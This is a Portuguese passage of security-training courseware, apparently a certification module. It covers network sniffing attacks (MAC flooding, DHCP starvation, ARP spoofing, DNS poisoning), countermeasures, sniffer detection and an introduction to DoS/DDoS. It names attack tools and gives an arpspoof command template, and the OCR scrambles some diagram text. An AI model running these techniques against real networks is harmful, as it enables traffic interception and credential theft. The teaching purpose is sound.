ÿ Etapa 5: A etapa anterior ajuda o invasor a desviar todo o tráfego do computador da vítima para o
computador do invasor. Este é um típico tipo de ataque man-in-the-middle (MITM).
Figura 6.8: Redirecionando o tráfego para o invasor
ÿ Passo 6: Agora, o atacante pode ver todos os pacotes de dados enviados e recebidos pela vítima.
O invasor agora pode extrair informações confidenciais dos pacotes, como senhas, nomes de
usuário, detalhes de cartão de crédito e PINs.
Figura 6.9: invasor extraindo informações confidenciais

Protocolos vulneráveis a sniffing
Telnet e Rlogin HTTP POP
ÿ Teclas incluindo nomes de usuários e senhas ÿ Os dados são enviados em texto não criptografado ÿ Senhas e dados são enviados em
são enviadas em texto não criptografado texto não criptografado
IMAP SMTP e NNTP FTP
ÿ Senhas e dados são enviados em ÿ Senhas e dados são enviados em texto ÿ Senhas e dados são enviados em
texto não criptografado não criptografado texto não criptografado
Protocolos vulneráveis a sniffing
Os seguintes protocolos são vulneráveis a sniffing. A principal razão para farejar esses protocolos é adquirir senhas.
ÿ Telnet e Rlogin
Telnet é um protocolo usado para comunicação com um host remoto (via porta 23) em uma rede usando um terminal
de linha de comando. O rlogin permite que um invasor faça login em uma máquina de rede remotamente por meio
de uma conexão TCP. Nenhum desses protocolos fornece criptografia; portanto, os dados que trafegam entre
clientes conectados por meio de qualquer um desses protocolos estão em texto sem formatação e vulneráveis a
sniffing. Os invasores podem farejar as teclas digitadas, incluindo nomes de usuários e senhas.
ÿ HTTP
Devido a vulnerabilidades na versão padrão do HTTP, os sites que implementam o HTTP transferem dados do
usuário pela rede em texto sem formatação, que os invasores podem ler para roubar as credenciais do usuário.
ÿ SNMP
O Simple Network Management Protocol (SNMP) é um protocolo baseado em TCP/IP usado para trocar informações
de gerenciamento entre dispositivos conectados em uma rede. A primeira versão do SNMP (SNMPv1) não oferece
segurança forte, o que leva à transferência de dados em formato de texto não criptografado. Os invasores exploram
as vulnerabilidades desta versão para adquirir senhas em texto sem formatação.

ÿ POP
Post Office Protocol (POP) permite que a estação de trabalho de um usuário acesse o correio de um servidor de
caixa de correio. Um usuário pode enviar e-mail da estação de trabalho para o servidor de caixa de correio via SMTP.
Os invasores podem farejar facilmente os dados que fluem por uma rede POP em texto não criptografado
devido às fracas implementações de segurança do protocolo.
ÿ IMAP
O Internet Message Access Protocol (IMAP) permite que um cliente acesse e manipule mensagens de correio
eletrônico em um servidor. Esse protocolo oferece segurança inadequada, o que permite que invasores obtenham
dados e credenciais de usuário em texto não criptografado.
ÿ SMTP
Simple Mail Transfer Protocol (SMTP) é usado para transmitir mensagens de e-mail pela Internet. Na maioria das
implementações, as mensagens SMTP são transmitidas em texto não criptografado, o que permite que invasores
capturem senhas em texto sem formatação. Além disso, o SMTP não fornece nenhuma proteção contra ataques de
sniffing.
ÿ NNTP
O Network News Transfer Protocol (NNTP) distribui, consulta, recupera e publica artigos de notícias usando uma
transmissão confiável baseada em fluxo de notícias entre a comunidade ARPA da Internet. No entanto, esse protocolo
falha ao criptografar os dados, o que permite que os invasores farejem informações confidenciais.
ÿ FTP
O File Transfer Protocol (FTP) permite que os clientes compartilhem arquivos entre computadores em uma rede.
Este protocolo não fornece criptografia; portanto, os invasores podem farejar dados, incluindo credenciais de usuário.

Fluxo do módulo
Entenda o pacote
1
Discutir Sniffing
2
Técnicas
Discutir Sniffing
Contramedidas
3
Discutir técnicas de farejamento

Os invasores usam várias técnicas de detecção, como ataques de MAC, ataques de DHCP, envenenamento de ARP, ataques
de falsificação e envenenamento de DNS, para roubar e manipular dados confidenciais. Os invasores usam essas técnicas para
obter controle sobre uma rede de destino lendo pacotes de dados capturados e, em seguida, usando essas informações para
invadir a rede.
Esta seção discute inundação de MAC, ataque de inanição de DHCP, falsificação de ARP, falsificação de MAC, ataques de
envenenamento de DNS e ferramentas de detecção.

Inundação de MAC
A inundação de MAC envolve a inundação da tabela CAM com Interruptores de inundação do Mac com macof
endereço MAC falso e pares de IP até que ela esteja cheia
macof é uma ferramenta Unix/Linux que inunda o switch
O switch então atua como um hub , transmitindo pacotes Tabelas CAM (131.000 por minuto) enviando falsos
para todas as máquinas na rede e, portanto, os invasores entradas MAC
podem farejar o tráfego facilmente
MAC Usuário 1
Inundação de endereços
Atacante Troca
Usuário 2
https:// www.monkey.org
Inundação de MAC
A inundação de MAC é uma técnica usada para comprometer a segurança dos switches de rede que conectam
segmentos ou dispositivos de rede. Os invasores usam a técnica de inundação de MAC para forçar um switch a
agir como um hub para que possam farejar facilmente o tráfego.
Em uma rede comutada, um switch Ethernet contém uma tabela CAM que armazena todos os endereços MAC
dos dispositivos conectados na rede. Um switch atua como um dispositivo intermediário entre um ou mais
computadores em uma rede. Ele procura quadros Ethernet, que carregam o endereço MAC de destino; então, ele
computa este endereço com o endereço MAC em sua tabela CAM e encaminha o tráfego para a máquina de
destino. Ao contrário de um hub, que transmite dados pela rede, um switch envia dados apenas para o destinatário
pretendido. Assim, uma rede comutada é mais segura em comparação com uma rede hub. No entanto, o tamanho
da tabela CAM é fixo e, como ela pode armazenar apenas um número limitado de endereços MAC, um invasor
pode enviar vários endereços MAC falsos para o switch. Nenhum problema ocorre até que a tabela de endereços
MAC esteja cheia. Assim que a tabela de endereços MAC estiver cheia, quaisquer solicitações adicionais podem
forçar o switch a entrar no modo fail-open. No modo fail-open, o switch começa a se comportar como um hub e
transmite o tráfego de entrada por todas as portas da rede. O invasor então altera a NIC de sua máquina para o
modo promíscuo para permitir que a máquina aceite todo o tráfego que entra nela. Assim, os invasores podem
farejar o tráfego facilmente e roubar informações confidenciais.

Figura 6.10: Inundação MAC
Chaves de inundação MAC com macof
Fonte: https:// www.monkey.org
macof é uma ferramenta Unix/Linux que faz parte da coleção dsniff. Ele inunda a rede local com endereços
MAC e IP aleatórios, fazendo com que alguns switches falhem e abram no modo de repetição, facilitando
assim o sniffing. Essa ferramenta inunda as tabelas CAM do switch (131.000 por minuto) enviando entradas
MAC forjadas. Quando a tabela MAC é preenchida e o switch é convertido para operação semelhante a um
hub, um invasor pode monitorar os dados que estão sendo transmitidos.
Figura 6.11: Inundação de MAC usando macof

Inanição de DHCP
Ataque
DHCP é um protocolo de configuração que atribui

1 endereços IP válidos para hospedar sistemas fora de um
pool DHCP pré-atribuído
Do utilizador Servidor DHCP
O usuário não O servidor fica sem
endereços IP para alocar
O ataque de inanição de DHCP é um processo conseguirá obter o endereço
MAC
Meu
é
2a:7b:12:2f:2c:4a
endereço IP válido a usuários válidos

de inundação de servidores DHCP com solicitações
2
de DHCP falsas e uso de todos os endereços IP
Escopo DHCP
disponíveis
10.10.10.1
10.10.10.2
Isso resulta em um ataque de negação de serviço, O invasor envia muitas 10.10.10.3

solicitações DHCP diferentes
3 onde o servidor DHCP não pode emitir um novo IP
com muitos MACs de origem
endereços para solicitações genuínas de host 10.10.10.254
Atacante
Ataque de fome de DHCP
DHCP é um protocolo de configuração que atribui endereços IP válidos a sistemas host de um conjunto DHCP pré-
atribuído. Em um ataque de privação de DHCP, um invasor inunda o servidor DHCP enviando várias solicitações de
DHCP e usa todos os endereços IP disponíveis que o servidor DHCP pode emitir. Como resultado, o servidor não
pode emitir mais endereços IP, levando a um ataque DoS. Devido a esse problema, usuários válidos não podem obter
ou renovar seus endereços IP; portanto, eles não conseguem acessar sua rede. Um invasor transmite solicitações
DHCP com endereços MAC falsificados com a ajuda de ferramentas como Yersinia, Hyenae e Gobbler.
Figura 6.12: Ataque de inanição de DHCP

Ataque de falsificação de ARP

Sim, estou
Como funciona a falsificação de ARP aqui Este é 10.1.1.1 e
meu endereço MAC é
A1-B1- C1-D1-E1-F1
Resolução de endereço
Cache ARP envenenado
Protocolo (ARP) é um protocolo
IP MAC
usado para mapear um endereço
10.1.1.0 21-56-88-99-55-66
IP para um endereço de máquina
Quero me conectar a 10.1.1.1 11-22-33-44-55-66
física que é reconhecido na rede 10.1.1.1, mas preciso Usuário B usuário C
10.1.1.2 55-88-66-55-33-44
de um endereço MAC
local Alternar transmissões
envia Solicitação ARP no O usuário legítimo real
fio responde à solicitação ARP
solicitação ARP
Troca
A falsificação/envenenamento Usuário
A (10.1.1.0)
ARP envolve o envio de um Envia seu malicioso O usuário mal-intencionado escuta
Endereço MAC a solicitação e as respostas ARP e
grande número de entradas Usuário D
finge ser o usuário legítimo
forjadas para o cache ARP da
Eu sou 10.1.1.1 e
máquina de destino
meu endereço MAC é
11-22-33-44-55-66
Informações para endereço IP Atacante

10.1.1.1 agora está sendo enviado
para o endereço MAC 11-22-33-44-55-66
Ataque de falsificação de ARP
O protocolo de resolução de endereço (ARP) é um protocolo usado para mapear um endereço IP para um endereço
de máquina física que é reconhecido na rede local. Os pacotes ARP podem ser forjados para enviar dados para a
máquina do invasor. A falsificação ARP envolve a construção de um grande número de solicitações ARP forjadas e
pacotes de resposta para sobrecarregar um switch. Quando uma máquina envia uma solicitação ARP, ela assume
que a resposta ARP virá da máquina certa. O ARP não fornece meios de verificar a autenticidade do dispositivo de
resposta. Mesmo os sistemas que não fizeram uma solicitação ARP podem aceitar as respostas ARP vindas de outros
dispositivos. Os invasores usam essa falha no ARP para criar respostas ARP malformadas contendo endereços IP e
MAC falsificados. Supondo que esta seja a resposta ARP legítima, o computador da vítima aceita cegamente a
entrada ARP em sua tabela ARP.
Depois que a tabela ARP é inundada com respostas ARP falsificadas, o switch é definido para o modo de
encaminhamento e o invasor intercepta todos os dados que fluem da máquina da vítima sem que a vítima esteja
ciente do ataque. Os invasores inundam o cache ARP de um computador de destino com entradas forjadas; isso
também é conhecido como envenenamento. A falsificação de ARP é um intermediário para executar ataques como
DoS, MITM e seqüestro de sessão.
Como funciona a falsificação de ARP?
A falsificação de ARP é um método de ataque a uma LAN Ethernet. Quando um usuário legítimo inicia uma sessão
com outro usuário no mesmo domínio de broadcast da camada 2, o switch transmite uma solicitação ARP usando o
endereço IP do destinatário, enquanto o remetente espera que o destinatário responda com um endereço MAC. Um
invasor espionando esse domínio de broadcast de camada 2 desprotegido pode responder à solicitação ARP de
broadcast e responder ao remetente falsificando o endereço IP do destinatário pretendido. O invasor executa um
sniffer e transforma o adaptador NIC da máquina em modo promíscuo.

A falsificação de ARP é um método de ataque a uma LAN Ethernet. Ele consegue alterar o
endereço IP do computador do invasor para o do computador de destino. Um pedido ARP forjado
e um pacote de resposta podem encontrar um lugar no cache ARP de destino neste processo.
Como a resposta ARP foi forjada, o computador de destino (alvo) envia quadros para o computador
do invasor, onde o invasor pode modificar os quadros antes de enviá-los para a máquina de origem
(Usuário A) em um ataque MITM. O invasor também pode lançar um ataque DoS associando um
endereço MAC inexistente ao endereço IP do gateway; alternativamente, o invasor pode farejar o
tráfego passivamente e então encaminhá-lo para o destino alvo.
Figura 6.13: Funcionamento de um ataque de falsificação ARP

Ferramentas de Envenenamento ARP
arpspoof
BetterCAP
arpspoof redireciona pacotes de um host de destino (ou todos os hosts) no
https:// www.bettercap.org
LAN destinada a outro host na LAN forjando respostas ARP
O cache ARP obtido e o endereço

Ettercap
MAC são substituídos pelo do
sistema do invasor
http:// www.ettercap-project.org
dsniff
https:// www.monkey.org
Comando reverso para que o

invasor possa enviar respostas nos dois sentidos MITMf
https:// github.com
Arpoison
https:// linux.die.net
Ferramentas de Envenenamento ARP
ÿ arpspoof
Fonte: https:// linux.die.net
arpspoof redireciona pacotes de um host de destino (ou todos os hosts) na LAN destinados a
outro host na LAN forjando respostas ARP. Esta é uma maneira extremamente eficaz de farejar
o tráfego em um switch.
Sintaxe:
arpspoof –i [Interface] –t [Host de destino]
Conforme mostrado na captura de tela, os invasores usam a ferramenta arpspoof para obter o
cache ARP; então, o endereço MAC é substituído pelo do sistema do invasor. Portanto,
qualquer tráfego que flua da vítima para o gateway será redirecionado para o sistema do invasor.
Além disso, um invasor pode emitir o mesmo comando ao contrário, pois está no meio e pode
enviar respostas ARP em ambas as direções.

Figura 6.14: Capturas de tela do arpspoof
Alguns exemplos de ferramentas de envenenamento ARP estão listados abaixo:
ÿ BetterCAP (https:// www.bettercap.org)

ÿ Ettercap (http:// www.ettercap-project.org)
ÿ dsniff (https:// www.monkey.org)
ÿ MITMf (https:// github.com)
ÿ Arpoison (https:// sourceforge.net)

Falsificação/duplicação de MAC
ÿ Um ataque de duplicação de MAC é iniciado ao farejar uma rede em busca de endereços MAC de clientes que estão ativamente
associado a uma porta de switch e reutilizar um desses endereços
ÿ Ao ouvir o tráfego na rede, um usuário mal-intencionado pode interceptar e usar o endereço MAC de um usuário legítimo
para receber todo o tráfego destinado ao usuário
ÿ Este ataque permite que um invasor obtenha acesso à rede e assuma a identidade de alguém na rede
Meu endereço
Regra de alternância: permitir acesso à rede
MAC é aa:bb:cc:dd:ee:ff somente se o seu endereço MAC for aa:bb:cc:dd:ee:ff
Troca O invasor fareja a rede em busca de endereços MAC

Usuário legítimo dos usuários atualmente associados e, em seguida, usa esse
Não! Endereço MAC para atacar outros usuários
Meu endereço associados à mesma porta do switch
MAC é aa:bb:cc:dd:ee:ff
Atacante
Internet
Falsificação/duplicação de MAC
A duplicação de MAC refere-se à falsificação de um endereço MAC com o endereço MAC de um usuário
legítimo na rede. Um ataque de duplicação de MAC envolve farejar uma rede em busca de endereços MAC
de clientes legítimos conectados à rede. Nesse ataque, o invasor primeiro recupera os endereços MAC dos
clientes que estão ativamente associados à porta do switch. Em seguida, o invasor falsifica um endereço
MAC com o endereço MAC do cliente legítimo. Se a falsificação for bem-sucedida, o invasor poderá receber
todo o tráfego destinado ao cliente. Assim, um invasor pode obter acesso à rede e assumir a identidade de
alguém na rede.
O diagrama mostra como um invasor executa um ataque de falsificação/duplicação de MAC.
Figura 6.15: ataque de falsificação/duplicação de MAC

Envenenamento de DNS
O envenenamento do servidor de nomes de domínio

(DNS) é a manipulação não autorizada de endereços
IP no cache do DNS
Um DNS corrompido redireciona

Google 8.8.8.8
uma solicitação do usuário para
Yahoo ………..
Google
Servidores
um site malicioso para realizar
DNS Bing …………
…….. ………..
atividades ilegais
Do utilizador
Google 6.7.8.9
Google
Yahoo 6.7.8.9 Servidores
Do utilizador
Bing 6.7.8.9
DNS envenenado
…….. 6.7.8.9
Servidores maliciosos
Envenenamento de DNS
DNS é o protocolo que traduz um nome de domínio (por exemplo, www.eccouncil.org) em um endereço IP (por exemplo,
208.66.172.56). O protocolo usa tabelas DNS que contêm o nome de domínio e seu endereço IP equivalente armazenado em um
grande banco de dados distribuído. No envenenamento de DNS, também conhecido como falsificação de DNS, o invasor engana
um servidor DNS fazendo-o acreditar que recebeu informações autênticas quando, na realidade, não recebeu nenhuma. O invasor
tenta redirecionar a vítima para um servidor malicioso em vez do servidor legítimo. O invasor faz isso manipulando as entradas da
tabela DNS no DNS. Isso resulta na substituição de um endereço IP falso no nível do DNS, onde os endereços da Web são
convertidos em endereços IP numéricos.
Quando a vítima tenta acessar um site, o invasor manipula as entradas na tabela DNS para que o sistema da vítima redirecione a
URL para o servidor do invasor. O invasor substitui as entradas de endereço IP de um site de destino em um determinado servidor
DNS pelo endereço IP do servidor (servidor malicioso) que ele controla. O invasor pode criar entradas de DNS falsas para o servidor
(contendo conteúdo malicioso) com os mesmos nomes do servidor de destino. Assim, a vítima se conecta ao servidor do invasor
sem perceber. Por exemplo, se a vítima digitar ww.google.com, a solicitação será redirecionada para o site falso www.goggle.com.
Depois que a vítima se conecta ao servidor do invasor, o invasor pode comprometer o sistema da vítima e roubar dados.

Figura 6.16: Ilustração de uma solicitação de DNS normal
Figura 6.17: Ilustração de uma solicitação DNS envenenada

Ferramentas de detecção: Wireshark
Wireshark ÿ O Wireshark permite capturar e navegar interativamente pelo

SteelCentral Packet Analyzer
tráfego em execução em uma rede de computadores https:// www.riverbed.com
Capsa Network Analyzer

https:// www.colasoft.com
Observador Analyzer
https:// www.viavisolutions.com
PRTG Network Monitor

https:// www.paessler.com
Inspeção e análise profunda

de pacotes SolarWinds
https:// www.solarwinds.com
https:// www.wireshark.org
Ferramentas de detecção
Os administradores de sistema usam ferramentas automatizadas para monitorar sua rede, mas os invasores fazem mau uso
dessas ferramentas para farejar dados de rede.
ÿ Wireshark
Fonte: https:// www.wireshark.org
O Wireshark permite capturar e navegar interativamente pelo tráfego em execução em uma rede de computadores.
Esta ferramenta usa WinPcap para capturar pacotes em suas próprias redes suportadas. Ele captura tráfego de rede
ao vivo de redes Ethernet, IEEE 802.11, PPP/HDLC, ATM, Bluetooth, USB, Token Ring, Frame Relay e FDDI. Os
arquivos capturados podem ser editados programaticamente por meio da linha de comando. Um conjunto de filtros
para exibição de dados personalizados pode ser refinado usando um filtro de exibição.
Conforme mostrado na captura de tela, os invasores usam o Wireshark para farejar e analisar o fluxo de pacotes na
rede de destino e extrair informações críticas sobre o alvo.

Figura 6.18: Capturando pacotes usando o Wireshark
Alguns exemplos de ferramentas de detecção adicionais estão listados abaixo:
ÿ SteelCentral Packet Analyzer (https:// www.riverbed.com)

ÿ Capsa Network Analyzer (https:// www.colasoft.com)
ÿ Observer Analyzer (https:// www.viavisolutions.com)
ÿ PRTG Network Monitor (https:// www.paessler.com)
ÿ Inspeção e análise profunda de pacotes SolarWinds (https:// www.solarwinds.com)

Fluxo do módulo
Entenda o pacote
1
Discutir Sniffing
2
Técnicas
Discutir Sniffing
Contramedidas
3
Discutir Contramedidas de Sniffing

A seção anterior descreve como um invasor realiza o sniffing com diferentes técnicas e
ferramentas. Esta seção descreve contramedidas e possíveis técnicas defensivas usadas para
defender uma rede alvo contra ataques de sniffing.

Cheirar Contramedidas
Restrinja o acesso físico à mídia de rede para garantir que um sniffer de pacotes não possa ser
instalado
Use criptografia de ponta a ponta para proteger informações confidenciais
Adicione permanentemente o endereço MAC do gateway ao cache ARP
Use endereços IP estáticos e tabelas ARP para impedir que invasores adicionem endereços falsificados
Entradas ARP para máquinas na rede
Desligue as transmissões de identificação de rede e, se possível, restrinja a rede a usuários autorizados

para evitar que a rede seja descoberta com ferramentas de detecção
Cheirar Contramedidas
Listadas abaixo estão algumas das contramedidas a serem seguidas para se defender contra o sniffing:
ÿ Restrinja o acesso físico à mídia de rede para garantir que um sniffer de pacotes não possa ser
instalado
ÿ Use criptografia de ponta a ponta para proteger informações confidenciais
ÿ Adicione permanentemente o endereço MAC do gateway ao cache ARP
ÿ Use endereços IP estáticos e tabelas ARP para impedir que invasores adicionem o falsificado
Entradas ARP para máquinas na rede
ÿ Desligue as transmissões de identificação de rede e, se possível, restrinja a rede a usuários autorizados para
proteger a rede de ser descoberta com ferramentas de detecção
ÿ Use IPv6 em vez de IPv4
ÿ Use sessões criptografadas como SSH em vez de telnet, Secure Copy (SCP) em vez de FTP e SSL para
conexão de e-mail para proteger usuários de rede sem fio contra ataques de sniffing
ÿ Use HTTPS em vez de HTTP para proteger nomes de usuários e senhas
ÿ Use um switch em vez do hub, pois um switch fornece dados apenas ao destinatário pretendido
ÿ Use Secure File Transfer Protocol (SFTP) em vez de FTP para transferência segura de arquivos
ÿ Use PGP e S/MIME, VPN, IPSec, SSL/TLS, SSH e senhas únicas (OTP)
ÿ Use POP2 ou POP3 em vez de POP para baixar e-mails de servidores de e-mail
ÿ Use SNMPv3 em vez de SNMPv1 e SNMPv2 para gerenciar dispositivos em rede

ÿ Sempre criptografe o tráfego sem fio com um protocolo de criptografia forte, como WPA ou
WPA2
ÿ Recuperar endereços MAC diretamente de NICs em vez do sistema operacional; isso impede o endereço MAC
falsificação
ÿ Use ferramentas para determinar se algum NIC está sendo executado em modo promíscuo
ÿ Use o conceito de Lista de Controle de Acesso (ACL) para permitir o acesso apenas a um intervalo fixo de
endereços IP confiáveis em uma rede
ÿ Alterar senhas padrão para senhas complexas
ÿ Evite transmitir SSIDs (Session Set Identifiers)
ÿ Implemente um mecanismo de filtragem MAC em seu roteador
ÿ Implementar ferramentas de varredura e monitoramento de rede para detectar invasões maliciosas,

dispositivos e sniffers conectados à rede

Técnicas de Detecção de Sniffer: Método Ping

Técnicas de Detecção de Sniffer: Método Ping
Mensagem de ping Mensagem de ping

(10.0.0.1, AA:BB:CC:DD:EE:FF) (10.0.0.1, AA:BB:CC:DD:EE:FF)
Promíscuo Não
Modo Resposta recebida
Promíscuo
Sem resposta
Administrador
Máquina Suspeita Modo Administrador
Máquina Suspeita
10.0.0.4, 10.0.0.1, 10.0.0.4, 10.0.0.1,
36-2E-3G-45-S6-K2 11-22-33-44-55-66 36-2E-3G-45-S6-K2 11-22-33-44-55-66
ÿ Envia uma solicitação de ping para a máquina suspeita com seu endereço IP e um endereço MAC incorreto. O adaptador Ethernet o rejeita,
pois o endereço MAC não corresponde, enquanto a máquina suspeita que executa o sniffer responde a ele, pois não rejeita pacotes com um
endereço MAC diferente
Técnicas de Detecção de Sniffer: Método DNS
A maioria dos sniffers realiza pesquisas reversas de DNS para identificar a máquina a partir do endereço IP
Ping (192.168.0.1)
Identificação IP: 192.168.168.1

MAC: 00-14-20-01-23-45
Marcha ré
Ping (192.168.0.2) Pesquisa de DNS

ID IP: 194.54.67.10
MAC: 00:1b:48:64:42:e4 MAC: 00-14-20-01-23-46 Servidor dns
Ping (192.168.0.3)
MAC: 00-14-20-01-23-47
É muito provável que uma máquina que gera tráfego de pesquisa de DNS reverso esteja executando um sniffer

Detecção de farejadores
Técnicas: ARP
Método ARP sem transmissão
Solicitação ARP
ID IP: 192.168.168.1
MAC: 00-14-20-01-23-45
ARP sem transmissão

Somente a máquina no modo promíscuo (máquina C)
armazena em cache as informações ARP
(Mapeamento de endereços IP e MAC)
Responder ping
ID IP: 194.54.67.10
MAC: 00:1b:48:64:42:e4 MAC: 00-14-20-01-23-46
Uma máquina no modo promíscuo responde
ARP sem transmissão
à mensagem de ping , pois possui as informações
corretas sobre o host que está enviando as solicitações
de ping em seu cache; o restante das máquinas enviará Solicitação ARP
uma sonda ARP para identificar a origem da solicitação ID IP: 192.168.168.3

MAC: 00-14-20-01-23-47
de ping
Técnicas de detecção de farejadores

ÿ Método Ping
Para detectar um sniffer em uma rede, identifique o sistema na rede em execução no modo
promíscuo. O método ping é útil para detectar um sistema que roda em modo promíscuo, o
que por sua vez ajuda a detectar sniffers instalados na rede.
Basta enviar uma solicitação de ping para a máquina suspeita com seu endereço IP e
endereço MAC incorreto. O adaptador Ethernet irá rejeitá-lo porque o endereço MAC não
corresponde, enquanto a máquina suspeita que executa o sniffer responde a ele, pois não
rejeita pacotes com um endereço MAC diferente. Assim, esta resposta irá identificar o sniffer
na rede.
Figura 6.19: Modo promíscuo
Figura 6.20: Modo não promíscuo

ÿ Método DNS
A pesquisa DNS reversa é o oposto do método de pesquisa DNS. Os sniffers que usam pesquisa DNS reversa
aumentam o tráfego de rede. Esse aumento no tráfego de rede pode ser uma indicação da presença de um
sniffer na rede. Os computadores nesta rede estão em modo promíscuo.
Os usuários podem realizar uma pesquisa DNS reversa remotamente ou localmente. Monitore o servidor DNS
da organização para identificar pesquisas DNS reversas recebidas. O método de envio de solicitações ICMP
para um endereço IP inexistente também pode monitorar pesquisas reversas de DNS. O computador que
executa a pesquisa reversa de DNS responderia ao ping, identificando-o como hospedeiro de um sniffer.
Para pesquisas DNS reversas locais, configure o detector no modo promíscuo. Envie uma solicitação ICMP
para um endereço IP inexistente e visualize a resposta. Se o sistema receber uma resposta, o usuário poderá
identificar a máquina respondente como realizando pesquisas reversas de DNS na máquina local. Uma
máquina que gera tráfego de pesquisa de DNS reverso provavelmente estará executando um sniffer.
Figura 6.21: Detecção de sniffing usando o método DNS
ÿ Método ARP
Essa técnica envia um ARP sem difusão para todos os nós da rede. O nó que executa em modo promíscuo
na rede armazenará em cache o endereço ARP local. Em seguida, ele transmitirá uma mensagem de ping na
rede com o endereço IP local, mas com um endereço MAC diferente. Nesse caso, apenas o nó que possui o
endereço MAC (armazenado anteriormente) poderá responder à sua solicitação de ping de transmissão. Uma
máquina em modo promíscuo responde à mensagem de ping, pois possui as informações corretas sobre o
host que está enviando solicitações de ping em seu cache; as máquinas restantes enviarão uma sonda ARP
para identificar a origem da solicitação de ping. Isso detectará o nó no qual o farejador está sendo executado.

Figura 6.22: Detectando sniffing por meio do método ARP

Negação de serviço
Negação de serviço
Os ataques de negação de serviço (DoS) e negação de serviço distribuído (DDoS) são uma grande ameaça
para as redes de computadores. Esses ataques tentam tornar uma máquina ou recurso de rede indisponível
para seus usuários autorizados. Normalmente, os ataques DoS/DDoS exploram vulnerabilidades na
implementação do modelo de protocolo de controle de transmissão (TCP)/protocolo de internet (IP) ou bugs
em um sistema operacional (SO) específico.

Fluxo
nosso do módulo
recurso
Discutir tipos de ataques

DoS e DDoS
Discutir DoS e DDoS

Contramedidas de ataque
Discutir tipos de ataques DoS e DDoS

Os invasores implementam várias técnicas para lançar ataques DoS/DDoS em computadores ou redes
de destino. Esta seção define os ataques DoS e DDoS e discute como os ataques DDoS funcionam. Isto
discute ainda mais as várias técnicas e ferramentas de ataque.

O que é um ataque DoS?

ÿ Denial-of-Service (DoS) é um ataque a um computador ou rede que
reduz, restringe ou impede o acesso dos recursos do sistema a
seus usuários legítimos
ÿ Os invasores inundam o sistema da vítima com serviços não legítimos

solicitações ou tráfego para sobrecarregar seus recursos
Tráfego malicioso
O tráfego malicioso consome

toda a largura de banda disponível
Roteador
Internet
tráfego de ataque
Trânsito Regular
Trânsito Regular cluster de servidor
O que é um ataque DoS?
Um ataque DoS é um ataque a um computador ou rede que reduz, restringe ou impede o acesso a recursos do
sistema para usuários legítimos. Em um ataque DoS, os invasores inundam o sistema da vítima com solicitações de
serviço ou tráfego não legítimos para sobrecarregar seus recursos e derrubar o sistema, levando à indisponibilidade
do site da vítima ou, pelo menos, reduzindo significativamente o desempenho do sistema ou da rede da vítima. O
objetivo de um ataque DoS é impedir que usuários legítimos usem o sistema, em vez de obter acesso não autorizado
a um sistema ou corromper dados.
A seguir, exemplos de tipos de ataques DoS:
ÿ Inundar o sistema da vítima com mais tráfego do que ela pode suportar
ÿ Inundar um serviço (por exemplo, Internet Relay Chat (IRC)) com mais eventos do que ele pode suportar
ÿ Falhando uma pilha TCP/IP enviando pacotes corrompidos
ÿ Falhando um serviço interagindo com ele de maneira inesperada
ÿ Pendurar um sistema fazendo com que ele entre em um loop infinito

Figura 6.23: Esquema de um ataque DoS
Os ataques DoS têm várias formas e visam vários serviços. Os ataques podem causar o seguinte:
ÿ Consumo de recursos
ÿ Consumo de largura de banda, espaço em disco, tempo de CPU ou estruturas de dados
ÿ Destruição física real ou alteração de componentes de rede
ÿ Destruição de programação e ficheiros num sistema informático
Em geral, os ataques DoS têm como alvo a largura de banda ou a conectividade da rede. Os ataques de largura
de banda transbordam a rede com um alto volume de tráfego usando recursos de rede existentes, privando,
assim, usuários legítimos desses recursos. Ataques de conectividade sobrecarregam um sistema com um grande
número de solicitações de conexão, consumindo todos os recursos disponíveis do sistema operacional para
evitar que o sistema processe solicitações legítimas de usuários.
Considere uma empresa de alimentação que realiza grande parte de seus negócios por telefone. Se um invasor
quiser interromper esse negócio, precisará encontrar uma maneira de bloquear as linhas telefônicas da empresa,
o que impossibilitaria a empresa de fazer negócios. Um ataque DoS funciona da mesma forma - o invasor usa
todas as formas de se conectar ao sistema da vítima, impossibilitando negócios legítimos.
Os ataques DoS são um tipo de violação de segurança que geralmente não resulta no roubo de informações. No
entanto, esses ataques podem prejudicar o alvo em termos de tempo e recursos.
Além disso, uma falha de segurança pode causar a perda de um serviço como o e-mail. Na pior das hipóteses,
um ataque DoS pode causar a destruição acidental de arquivos e programas de milhões de pessoas que estavam
conectadas ao sistema da vítima no momento do ataque.

O que é um Ataque DDoS?
A negação de serviço distribuída (DDoS) é um ataque coordenado que

envolve vários sistemas comprometidos (Botnet) atacando um único
alvo, negando assim o serviço aos usuários do sistema alvo
Como funcionam os ataques DDoS?
Handler infecta um
grande número de
computadores pela
Sistemas zumbis são
Internet
instruídos a atacar um
Atacante define um 2 3 servidor de destino
sistema de manipulador 1
Manipulador
PCs comprometidos (zumbis)
Atacante Visadas
1 Servidor
2 3
Manipulador
PCs comprometidos (zumbis)
O que é um Ataque DDoS?
Fonte: https:// searchsecurity.techtarget.com
Um ataque DDoS é um ataque coordenado em larga escala à disponibilidade de serviços no sistema ou recursos de
rede de uma vítima e é iniciado indiretamente por meio de muitos computadores comprometidos (botnets) na Internet.
Conforme definido pelas Perguntas Frequentes sobre Segurança na World Wide Web, “Um ataque distribuído de
negação de serviço (DDoS) usa muitos computadores para lançar um ataque DoS coordenado contra um ou mais
alvos. Usando a tecnologia cliente/servidor, o perpetrador é capaz de multiplicar significativamente a eficácia da
negação de serviço, aproveitando os recursos de vários computadores cúmplices involuntários, que servem como
plataformas de ataque.” A enxurrada de mensagens recebidas no sistema de destino basicamente o força a desligar,
negando assim o serviço a usuários legítimos.
Os serviços sob ataque pertencem à “vítima principal”, enquanto os sistemas comprometidos usados para iniciar o
ataque são chamados de “vítimas secundárias”. O uso de vítimas secundárias na execução de um ataque DDoS
permite que o invasor monte um ataque grande e perturbador, dificultando o rastreamento do invasor original.
O objetivo principal de um ataque DDoS é primeiro obter acesso administrativo no maior número possível de sistemas.
Em geral, os invasores usam um script de ataque personalizado para identificar sistemas potencialmente vulneráveis.
Depois de obter acesso aos sistemas de destino, o invasor carrega e executa o software DDoS nesses sistemas no
momento escolhido para iniciar o ataque.
Os ataques DDoS tornaram-se populares devido à fácil acessibilidade dos planos de exploração e à quantidade
insignificante de trabalho intelectual necessário para executá-los. Esses ataques podem ser muito perigosos porque
podem consumir rapidamente os maiores hosts da Internet, tornando-os inúteis.

Os impactos do DDoS incluem a perda de reputação, redes desativadas, perdas financeiras e organizações desativadas.
Como funcionam os ataques DDoS?
Em um ataque DDoS, muitos aplicativos bombardeiam um navegador ou rede de destino com solicitações externas
falsas que tornam o sistema, a rede, o navegador ou o site lento, inútil e desativado ou indisponível.
